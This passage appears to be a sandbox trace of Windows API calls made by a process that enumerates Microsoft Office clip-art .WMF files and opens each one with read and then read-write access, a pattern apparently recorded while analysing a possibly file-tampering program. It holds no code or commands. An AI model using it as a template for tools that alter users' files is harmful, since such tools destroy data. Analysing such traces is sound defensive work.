(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.042] AreFileApisANSI () returned 1 [0102.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0102.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 69 [0102.042] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ef0)) returned 1 [0102.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0102.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0102.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.042] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4124, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD06200_.WMF", cAlternateFileName="")) returned 1 [0102.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0102.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0102.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0102.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0102.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0102.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0102.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0102.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0102.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0102.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0102.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0102.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.043] AreFileApisANSI () returned 1 [0102.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0102.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0102.043] AreFileApisANSI () returned 1 [0102.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ac50 [0102.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8ac50, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 69 [0102.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.044] GetFileType (hFile=0x33c) returned 0x1 [0102.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0102.044] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.044] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.044] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.045] CloseHandle (hObject=0x33c) returned 1 [0102.045] AreFileApisANSI () returned 1 [0102.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0102.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 69 [0102.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.045] GetFileType (hFile=0x33c) returned 0x1 [0102.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0102.045] CloseHandle (hObject=0x33c) returned 1 [0102.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0102.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0102.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.046] AreFileApisANSI () returned 1 [0102.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8abb8 [0102.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 69 [0102.047] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4124)) returned 1 [0102.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0102.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0102.047] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.047] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.047] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x687c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD07761_.WMF", cAlternateFileName="")) returned 1 [0102.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0102.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0102.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0102.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0102.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0102.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0102.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0102.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0102.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0102.048] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.048] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.048] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.048] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0102.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.048] AreFileApisANSI () returned 1 [0102.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0102.048] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.048] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0102.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.048] AreFileApisANSI () returned 1 [0102.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0102.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 69 [0102.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.057] GetFileType (hFile=0x33c) returned 0x1 [0102.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.057] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.057] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.058] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.058] CloseHandle (hObject=0x33c) returned 1 [0102.058] AreFileApisANSI () returned 1 [0102.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0102.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 69 [0102.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.058] GetFileType (hFile=0x33c) returned 0x1 [0102.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0102.058] CloseHandle (hObject=0x33c) returned 1 [0102.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0102.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 